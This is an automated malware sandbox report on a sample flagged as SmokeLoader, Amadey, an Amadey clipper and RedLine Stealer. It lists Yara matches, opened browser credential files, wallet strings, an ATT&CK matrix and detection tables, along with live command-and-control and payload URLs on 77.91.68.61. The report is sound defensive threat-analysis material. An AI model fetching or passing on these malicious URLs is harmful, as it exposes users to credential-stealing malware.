Source: Yara match	File source: 00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.725994523.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.468231833.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000000.854696762.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.483252105.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.476404974.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.476570672.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.727223377.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.471614340.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.481814915.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.479942590.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.855768212.0000000001031000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: q4B165cujP.exe, type: SAMPLE
Source: Yara match	File source: 4.0.jfshvii.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q4B165cujP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.q4B165cujP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.jfshvii.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.480765543.00000000004D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420695130.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420680408.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.480510597.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jfshvii, type: DROPPED

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.908312889.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pdates.exe PID: 6940, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 26.2.rundll32.exe.6e800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: ohcompetitive.exe, 0000000D.00000002.793791728.00000000089E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: Process Memory Space: j8994074.exe PID: 6840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: n7660022.exe PID: 6980, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.3.6F2B.exe.5125820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.j8994074.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.D217.exe.e9da20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.481478522.00000000007A2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.467119503.00000000050EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.469686347.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: j8994074.exe PID: 6840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: n7660022.exe PID: 6980, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: q4B165cujP.exe, type: SAMPLE
Source: Yara match	File source: 4.0.jfshvii.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q4B165cujP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.q4B165cujP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.jfshvii.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.480765543.00000000004D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420695130.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420680408.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.480510597.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jfshvii, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Native API	1 Scheduled Task/Job	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	1 Registry Run Keys / Startup Folder	512 Process Injection	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Command and Scripting Interpreter	1 Services File Permissions Weakness	1 Scheduled Task/Job	3 Software Packing	NTDS	139 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	Data Transfer Size Limits	125 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	1 Services File Permissions Weakness	1 DLL Side-Loading	Cached Domain Credentials	651 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 File Deletion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	441 Virtualization/Sandbox Evasion	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	441 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	512 Process Injection	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Hidden Files and Directories	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	1 Services File Permissions Weakness	GUI Input Capture	Domain Groups	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement
Trusted Relationship	Python	Hypervisor	Process Injection	1 Rundll32	Web Portal Capture	Cloud Groups	Attack PC via USB Connection	Local Email Collection	Standard Application Layer Protocol	Internal Proxy			Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
q4B165cujP.exe	83%	Virustotal		Browse
q4B165cujP.exe	100%	Avira	TR/Crypt.XPACK.Gen
q4B165cujP.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	100%	Avira	TR/Disabler.ocayi
C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	100%	Avira	TR/Disabler.ocayi
C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	100%	Avira	TR/Disabler.ocayi
C:\Users\user\AppData\Local\Temp\D217.exe	100%	Avira	TR/Disabler.ocayi
C:\Users\user\AppData\Local\Temp\D217.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Local\Temp\3448.exe	100%	Avira	HEUR/AGEN.1309865
C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	100%	Avira	HEUR/AGEN.1310591
C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	100%	Avira	HEUR/AGEN.1309865
C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	100%	Avira	TR/Disabler.ocayi
C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Roaming\jfshvii	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\6F2B.exe	100%	Avira	TR/Disabler.ocayi
C:\Users\user\AppData\Local\Temp\6F2B.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	100%	Avira	HEUR/AGEN.1309865
C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	100%	Avira	HEUR/AGEN.1310591
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	100%	Avira	HEUR/AGEN.1301048
C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	100%	Avira	HEUR/AGEN.1301048
C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7_Fjlbt.cpl	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\D217.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\jfshvii	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6F2B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/8	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp//	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/&	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/X	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/U	0%	URL Reputation	safe
http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://77.91.68.61/rock/index.php	100%	URL Reputation	malware
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/o	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/p	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/g	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://77.91.68.61/rock/index.php1/rock/index.php	100%	URL Reputation	malware
http://77.91.68.61/rock/Plugins/cred64.dll	100%	URL Reputation	malware
http://tempuri.org/Entity/Id19Responseh	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/(F	0%	Virustotal		Browse
http://www.founder.com.cn/cn/qR	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/of	1%	Virustotal		Browse
http://www.founder.com.cn/cn/of	0%	Avira URL Cloud	safe
http://77.91.68.61/rock/index.phpcsD4Q	0%	Avira URL Cloud	safe
http://www.fontbureau.comrsiv&	0%	Avira URL Cloud	safe
http://77.91.68.61/rock/index.phpSB	0%	Avira URL Cloud	safe
http://www.fontbureau.comessedU	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/(F	0%	Avira URL Cloud	safe
http://www.fontbureau.comuev	0%	Avira URL Cloud	safe
http://www.fontbureau.comd/	0%	Avira URL Cloud	safe
http://77.91.68.61/rock/index.php1/rock/index.php-5	0%	Avira URL Cloud	safe
http://www.monotype.c	0%	Avira URL Cloud	safe
http://www.founder.cHI	0%	Avira URL Cloud	safe
http://www.fontbureau.comF8	0%	Avira URL Cloud	safe
http://77.91.68.61/rock/Plugins/clip64.dllgP	100%	Avira URL Cloud	malware
http://77.91.68.61/rock/index.php=B	0%	Avira URL Cloud	safe
http://77.91.68.61/rock/Plugins/cred64.dllb05	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
files.catbox.moe	108.181.20.35	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://77.91.68.61/rock/index.php	true	URL Reputation: malware	unknown
https://files.catbox.moe/67ou2d.mp4	false		high
http://77.91.68.61/rock/Plugins/cred64.dll	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	j8994074.exe, 0000001C.00000002.711187099.0000000003FCE000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000003034000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.000000000528B000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005120000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.0000000005103000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.765324390.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003E29000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CBD000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004139000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000004156000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.711187099.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000004143000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.000000000443C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	n7660022.exe, 0000001E.00000002.698805484.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A5A000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comd/	ohcompetitive.exe, 0000000D.00000003.519426984.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.521005742.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519704126.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519898696.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.519072643.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520716541.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520042323.0000000005A01000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.520548523.0000000005A01000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.91.68.61/rock/index.phpcsD4Q	pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Response	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	j8994074.exe, 0000001C.00000002.691450585.0000000003041000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, j8994074.exe, 0000001C.00000002.691450585.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/qR	ohcompetitive.exe, 0000000D.00000003.485921612.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/(F	ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/of	ohcompetitive.exe, 0000000D.00000003.487287458.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.487679733.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/8	ohcompetitive.exe, 0000000D.00000003.491869030.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494872998.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.494716862.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.493511255.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.492786739.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.495668506.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	false		high
